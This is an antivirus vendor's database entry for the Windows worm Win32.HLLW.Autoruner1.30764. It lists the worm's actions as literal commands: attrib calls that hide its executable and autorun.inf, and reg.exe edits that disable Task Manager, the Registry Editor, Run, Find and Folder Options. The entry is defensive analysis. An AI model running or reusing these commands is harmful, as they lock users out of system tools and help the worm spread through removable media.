JavaScript support is required for our site to be fully operational in your browser.
Win32.HLLW.Autoruner1.30764
Added to the Dr.Web virus database:
2012-11-28
Virus description added:
2012-11-28
Technical Information
To ensure autorun and distribution:
Creates the following files on removable media:
<Drive name for removable media>:\autorun.inf
Malicious functions:
To complicate detection of its presence in the operating system,
forces the system hide from view:
blocks execution of the following system utilities:
Windows Task Manager (Taskmgr)
Registry Editor (RegEdit)
Executes the following:
<SYSTEM32>\attrib.exe +s +a +h +r F:\charity.exe
<SYSTEM32>\attrib.exe +s +a +h +r G:\charity.exe
<SYSTEM32>\attrib.exe +s +a +h +r H:\charity.exe
<SYSTEM32>\attrib.exe +s +a +h +r E:\charity.exe
<SYSTEM32>\rundll32.exe shell32.dll,Activate_RunDLL
<SYSTEM32>\attrib.exe +s +a +h +r C:\charity.exe
<SYSTEM32>\attrib.exe +s +a +h +r <Drive name for removable media>:\charity.exe
<SYSTEM32>\attrib.exe +s +a +h +r I:\charity.exe
<SYSTEM32>\attrib.exe +s +a +h +r G:\autorun.inf
<SYSTEM32>\attrib.exe +s +a +h +r H:\autorun.inf
<SYSTEM32>\attrib.exe +s +a +h +r I:\autorun.inf
<SYSTEM32>\attrib.exe +s +a +h +r F:\autorun.inf
<SYSTEM32>\attrib.exe +s +a +h +r C:\autorun.inf
<SYSTEM32>\attrib.exe +s +a +h +r <Drive name for removable media>:\autorun.inf
<SYSTEM32>\attrib.exe +s +a +h +r E:\autorun.inf
<SYSTEM32>\reg.exe add "HKCR\Folder\shell\explore" /v "" /t reg_sz /d "Charity Virus" /f
<SYSTEM32>\reg.exe add "HKCR\Folder\shell\open" /v "" /t reg_sz /d "Spread me" /f
<SYSTEM32>\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f
<SYSTEM32>\reg.exe add "HKCU\Control Panel\International" /v "s2359" /t reg_sz /d "madforelmo" /f
<SYSTEM32>\cmd.exe /c ""%TEMP%\actmovie.bat" > NUL"
<SYSTEM32>\reg.exe add "HKCU\Control Panel\International" /v "sTimeFormat" /t reg_sz /d "h:mm:ss tt" /f
<SYSTEM32>\reg.exe add "HKCU\Control Panel\International" /v "s1159" /t reg_sz /d "SpreadMe" /f
<SYSTEM32>\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t reg_dword /d 1 /f
<SYSTEM32>\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden" /t reg_dword /d 0 /f
<SYSTEM32>\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t reg_dword /d 0 /f
<SYSTEM32>\label.exe c: charityvir
<SYSTEM32>\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDriveTypeAutoRun /t REG_DWORD /d 128 /f
<SYSTEM32>\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t reg_dword /d 1 /f
<SYSTEM32>\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
<SYSTEM32>\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
Modifies settings of Windows Explorer:
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFind' = '00000001'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRun' = '00000001'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
Modifies file system :
Creates the following files:
C:\autorun.inf
<SYSTEM32>\autorun.inf
%TEMP%\actmovie.bat
Sets the 'hidden' attribute to the following files:
<Drive name for removable media>:\autorun.inf
C:\autorun.inf
Download Dr.Web for Android
Free three-month trial
All protection features available
Renew your trial license in AppGallery/on Google Pay
By continuing to use this website, you are consenting to Doctor Web’s use of cookies and other technologies related to the collection of visitor statistics. Learn more
OK